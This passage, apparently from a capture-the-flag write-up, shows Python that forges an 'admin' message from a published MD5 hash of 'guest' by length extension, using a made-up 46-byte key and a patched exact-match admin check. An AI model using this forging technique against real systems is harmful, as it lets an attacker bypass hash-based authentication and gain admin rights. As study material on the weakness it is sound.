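    return hmac.compare_digest(hmac_tag(key, msg), tag)

def is_admin(username):
    """Exact match instead of the substring test used in the challenge."""
    return username == b"admin"

# Constructed 46-byte key; the real challenge key is not on the page.
KEY = b"k" * 46
FORGED = extended_message(b"guest", b"admin", secret_len=46)
```

With a 46-byte key, key + guest + padding fills exactly one 64-byte MD5 block, which is why the published hash of guest is a valid starting state for hashing the appended admin.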
